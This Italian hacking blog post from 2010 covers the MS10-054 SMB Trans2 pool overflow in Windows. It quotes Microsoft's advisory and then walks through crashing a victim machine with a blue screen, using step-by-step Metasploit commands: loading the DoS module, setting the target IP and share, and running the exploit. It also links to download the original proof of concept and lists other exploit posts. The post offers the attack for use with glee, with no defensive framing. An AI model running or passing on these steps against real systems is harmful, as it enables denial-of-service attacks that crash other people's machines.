[MS10-054]Metasploit:Remote DOS Microsoft SMB Server Trans2
E il nostro amico g-laurent, famoso per i suoi exploit ha scoperto una nuova vulnerabilità del protocollo SMB di windows :P
Cosa possiamo fare con questo exploit o.O ?
Dal sito microsoft:
Vulnerability details
In order to exploit CVE-2010-2550, the attacker must have read permission on a SMB share on the target system. This implies that the attacker is authenticated, or that the target allows anonymous access to network shares (this is a default configuration only on Windows XP with later platforms requiring authentication by default)
By sending a specially crafted SMB request to the target, an attacker with read access could cause a kernel pool block to be overrun. This is due to an attacker-provided length being used as the size value in an allocation call. If an attacker specifies a small size value, the system will later write data to this buffer, which will corrupt the adjacent pool block(s). The data used in the overwrite comes from the disk or file system on the target machine.
Quindi, causiamo una schermata blue :D
Sistemi affetti:
Windows:
- 2000
- XP
- 2003
- Vista
- 2008
- 7
- 2008R2
Vediamo come usare questo exploit, con metasploit :D
Aggiorniamo:
sudo svn update
Usiamo l’exploit:
use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
Settiamo l’ip vittima:
set RHOST 192.168.1.154
La condivisione:(nel mio caso users)
set SMBSHARE Users
E lanciamo l’exploit:
exploit
Avrete la schermata c’è nella immagine sopra se tutto va bene :D
DOWNLOAD POC/EXPLOIT ORIGINALE
Related posts:
- [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
- IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
- [EXPLOIT]Windows Help Centre Remote code Excution
- [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
- [Metasploit]Sun Java Web Start Plugin Remote Code Excution
This entry was posted on Thursday, August 12th, 2010 at 12:17 pm and is filed under Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Tagged with: dos • remote • smb • Windows • wxploit






